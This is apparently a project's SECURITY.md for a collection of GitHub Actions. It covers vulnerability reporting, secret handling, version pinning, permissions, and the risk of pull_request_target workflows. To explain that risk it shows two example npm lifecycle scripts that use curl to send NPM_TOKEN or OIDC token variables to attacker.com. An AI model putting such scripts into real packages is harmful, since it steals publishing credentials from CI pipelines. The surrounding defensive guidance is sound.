- Supported Versions
- Reporting a Vulnerability
- Security Best Practices for Users
- Security Features
- Known Security Considerations
- Incident Response
- Security Contact
- Acknowledgments
This project follows a rolling release model. We provide security updates for:
| Version | Supported |
|---|---|
| main | β Always supported |
| Latest release tags | β Supported |
| Older releases | β Not supported |
If you discover a security issue, please follow these steps:
Do NOT create a public issue for security vulnerabilities.
Instead, please report security issues privately using one of these methods:
-
GitHub Security Advisories (preferred)
- Go to the Security tab
- Click "Report a vulnerability"
- Fill out the form with details
-
Email
- Send details to: chris@codfish.dev
- Include "SECURITY" in the subject line
When reporting a vulnerability, please include:
- Description of the vulnerability
- Steps to reproduce the issue
- Potential impact of the vulnerability
- Suggested fix (if you have one)
- Your contact information for follow-up
We aim to respond to security reports within:
- Initial response: 24-48 hours
- Confirmation/triage: 2-5 business days
- Resolution: Varies based on complexity
When using these GitHub Actions in your workflows:
- Never log secrets in workflows that use these actions
- Use GitHub Secrets for sensitive information
- Limit secret scope to only necessary workflows
- Rotate secrets regularly
# β
Good - Using secrets properly
- uses: codfish/actions/npm-pr-version@v3
with:
npm-token: ${{ secrets.NPM_TOKEN }}
# β Bad - Exposing secrets
- name: Debug
run: echo "Token: ${{ secrets.NPM_TOKEN }}"- Pin to specific versions or commit hashes for production workflows
- Avoid using
@mainin production (use for testing only)
# β
Good - Pinned version
- uses: codfish/actions/setup-node-and-install@v3.2.3
# β οΈ Caution - Latest main (testing only)
- uses: codfish/actions/setup-node-and-install@v3- Use minimal permissions required
- Specify explicit permissions when possible
- Avoid using
write-allpermissions
# β
Good - Minimal permissions
permissions:
contents: read
issues: write
pull-requests: write
# β Bad - Excessive permissions
permissions: write-all- Validate user inputs before using them in actions
- Sanitize outputs when displaying them
- Be cautious with dynamic expressions
This project implements several security measures:
- Dependabot for dependency updates
- CodeQL for static analysis
- Dependency Review for PR security checks
- Secret scanning with TruffleHog
- npm audit for vulnerability detection
- Input validation in all actions
- Error handling without information disclosure
- No secret logging in any action
- Least privilege principle in action permissions
- Minimal dependencies to reduce attack surface
- Regular dependency updates via Dependabot
- Verified action references in workflows
- Actions run in GitHub's infrastructure - we cannot control the runner environment
- Secrets are available to all steps in a job that has access
- Workflow logs are visible to users with read access to the repository
If you're an open source project using pull_request_target to publish PR packages from external contributors,
consider using the secure tarball mode to protect against lifecycle script attacks.
When is this relevant?
- β
You use
pull_request_target(notpull_request) - β You accept PRs from external contributors
- β
Your workflow has access to publishing credentials (
npm-tokenORid-token: writefor OIDC)
Not relevant if:
- β You use
pull_requestevent (no secret access from forks) - β You only publish from trusted branches
The Risk:
npm automatically executes lifecycle scripts during publishing:
prepublishOnly,prepare,prepack,postpack
A malicious PR could add a script that exfiltrates credentials:
With npm-token:
{
"scripts": {
"prepublishOnly": "curl https://attacker.com?token=$NPM_TOKEN"
}
}With OIDC (even without npm-token):
{
"scripts": {
"prepublishOnly": "curl https://attacker.com?url=$ACTIONS_ID_TOKEN_REQUEST_URL&token=$ACTIONS_ID_TOKEN_REQUEST_TOKEN"
}
}
β οΈ OIDC is just as vulnerable! The OIDC environment variables allow attackers to mint tokens and publish packages.
Recommended Solution:
Use the secure two-step workflow with tarball mode:
on: pull_request_target
jobs:
build:
# Build with untrusted code (no secrets)
permissions:
contents: read
steps:
- uses: actions/checkout@v6
with:
ref: ${{ github.event.pull_request.head.sha }}
- run: npm ci && npm run build && npm pack
- uses: actions/upload-artifact@v4
with:
name: package-tarball
path: '*.tgz'
publish:
needs: build
# Publish with secrets and --ignore-scripts
permissions:
contents: read
id-token: write # For OIDC (or omit if using npm-token)
pull-requests: write # For commenting
steps:
- uses: actions/checkout@v6 # Trusted base branch
- uses: actions/download-artifact@v4
with:
name: package-tarball
- uses: codfish/actions/npm-pr-version@v3
with:
tarball: '*.tgz'See npm-publish-pr/README.md for full details.
- NPM tokens have broad permissions - ensure tokens are scoped appropriately
- Published packages are public by default - review package contents
- Version immutability - published versions cannot be unpublished
- GitHub tokens can comment on behalf of the workflow user
- Comment content is public - avoid including sensitive information
- Rate limiting applies - excessive commenting may be throttled
In case of a confirmed security vulnerability:
- Assessment - Evaluate severity and impact
- Mitigation - Develop and test fixes
- Disclosure - Coordinate with reporter on disclosure timeline
- Release - Deploy security fixes
- Communication - Notify users through appropriate channels
- Primary: security@codfish.dev
- GitHub: @codfish
We appreciate security researchers and users who responsibly disclose vulnerabilities. Contributors who report valid security issues will be acknowledged (with permission) in:
- Security advisories
- Release notes
- This security policy
Thank you for helping keep this project secure! π